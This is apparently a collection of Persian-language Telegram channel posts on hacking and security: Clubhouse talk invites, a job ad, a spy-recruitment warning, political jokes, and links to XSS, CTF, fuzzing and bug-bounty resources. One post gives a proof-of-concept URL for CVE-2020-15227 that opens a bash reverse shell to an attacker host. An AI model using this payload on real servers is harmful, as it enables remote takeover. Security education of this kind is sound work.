از نگاه احسان

امشب ساعت ۱۱ میخوایم توی کلاب هاوس درباره هک و امنیت صحبت کنیم و به سوالات شما پاسخ بدیم. https://www.joinclubhouse.com/event/mZGgVApy

جوین شید :)

امشب توی کلاب هوس میخوایم راجب هک اکانت اینستاگرام و تلگرام صحبت کنیم. ساعت ۱۰:۰۰ جوین شید. https://www.joinclubhouse.com/event/m2E9Kd91

چیشد اومدی هک یاد بگیری؟ https://www.joinclubhouse.com/room/xVlA4bkz

#موقت به یه برنامه نویس React.js نیاز دارم. برای وصل کردن وب اپ به API، کامپوننت ها قبلا ساخته شدن و نیاز به تغییرات ریز دارن. 5 تا State باید هندل کنه. Layout قبلا طراحی شده و تبدیل به کامپوننت React شده. @pentester_support

🔹مرکز امنیت سایبری آمریکا هر از چند گاهی درباره شکار شدن توسط جاسوسان خارجی هشدار میدهد 🔹بسیاری از افراد تحصیل‌کرده و جوان با پیچیدگی کار سازمان‌های اطلاعاتی آشنایی ندارند، و به راحتی شکار میشوند. دعوت به شرکت در یک کنفرانس بین‌المللی، همراه با پرداخت هزینه بلیت و هتل، را بعید است کسی رد کند. 🔹اما همین موقعیت کافی است تا بلایی سر آدم بیاورند که تا آخر عمرش نتواند از منویات آن سازمان اطلاعاتی سرپیچی کند. 🔹ای کاش در ایران هم کسی در این باره به جوانترها آموزش کافی بدهد. https://twitter.com/NCSCgov/status/1352744719437213696 #جاسوسی #امنیت_اطلاعات @securation

پشمهاتون نریزه ولی ایشون واعظی هستند . وزیر سابق ارتباطات ! به بیت کوین میگه بیت کورن!!!! رائفی پور رو بیارید عزاداری رو شروع کنیم و اولش بگه : خدایا بسه دیگه ! خسته شدیم ! آخه تا کِی؟؟؟؟ و ملت بزنیم توی سر خودمون که اینا مسئولین ما هستند. در تاریخ ثبت شد. #واعظی #دولت_روحانی #بیت_کورن #بیسوادها #ملت_بدبختها @securation

چه اتفاقی میافته اگر Commit های پروژه خودتون رو Sign نکنید؟ یکی جای یکی دیگه Commit میزنه 😁 لایو فرشاد رو ببینید: https://cutt.ly/FjuOsXm

گروه عمومی PentesterSchool https://t.me/joinchat/VCDImEULhp6w3C37

#DOM #XSS #DOMXSS #DOM_XSS اگر قصد دارید با توابع آسیب‌پذیر نسبت به DOM XSS بیشتر آشنا بشید توصیه می‌کنم مقاله Acunetix که در این خصوص توضیحات مختصری را داده مطالعه کنید. اگر قصد استفاده از توابعی مانند - document.URL - location.hash - document.referrer - eval - ... را دارید باید دقت لازم را در خصوص امنیت آن نیز داشته باشید. کشف این دسته از XSS‌ها به مراتب سخت‌تر از انواع دیگر آن می‌باشد. https://www.acunetix.com/blog/articles/finding-source-dom-based-xss-vulnerability-acunetix-wvs @securation

⭕️مهم خب حالا که تقریبا ۱۵۰۰ نفر اینجا #توییتر دارن و مایلن از وب آموز حمایت کنن این متن رو توییت کنید: Dear @JACK and @TwitterSupport, please lift the suspension on #MohammadJorjandi @s7az2mm account, His account has been wrongly reported, likely by the criminals that he exposes. He is our voice against Iranian cybercriminals. لطفا به اشتراک بذارید 🆔 @Webamoozir

این ورکشاپ هک کردن اپلیکیشن اندروید در مسابقات CTF با هدف کشف آسیب پذیری و اکسپلویت کردن آن که چند نمونه از باگ بانتی های هکروان رو هم در خودش جا داده و خیلی فنی کار رو به آخر رسونده رو ببینید. ویدیو ها: https://youtu.be/PMKnPaGWxtg اسلایدهای مرتبط ورکشاپ: https://docs.google.com/presentation/d/1gK2vYdvwFn8r8dSawIWRRIF4yDF4qmMY2qEelS1M7rI/edit#slide=id #android #ctf #bug_bounty @securation

CVE-2020-15227 PHP framework nette callback RCE POC: /nette.micro?callback=shell_exec&cmd=bash%20-i%20>&%20/dev/tcp/'+lhost+'/'+lport+'0>&1 @securation

pluralsight برای یک هفته کل دوره های آموزشیشو رایگان کرده :) https://bit.ly/3dhyppm https://twitter.com/pluralsight/status/1315692022485852161

Fuzzing JavaScript Engines with Aspect-preserving Mutation https://github.com/sslab-gatech/DIE #reverse #expdev #fuzzing #javascript @securation

TLS Poison A tool that allows for generic SSRF via TLS, as well as CSRF via image tags in most browsers. The goals are similar to SNI injection, but this new method uses inherent behaviors of TLS, instead of depending upon bugs in a particular implementation. https://github.com/jmdx/TLS-poison/ #tools #appsec #web #bugbounty @pentesterschool

رایت آپ کشف آسیب پذیری RCE و آنلاک مودم/روتر Seowon Slc-130 https://virgool.io/@maj0rmil4d/رایت-آپ-کشف-آسیب-پذیری-در-مودمروتر-seowon-slc-130-iggc9ij95vxz @securation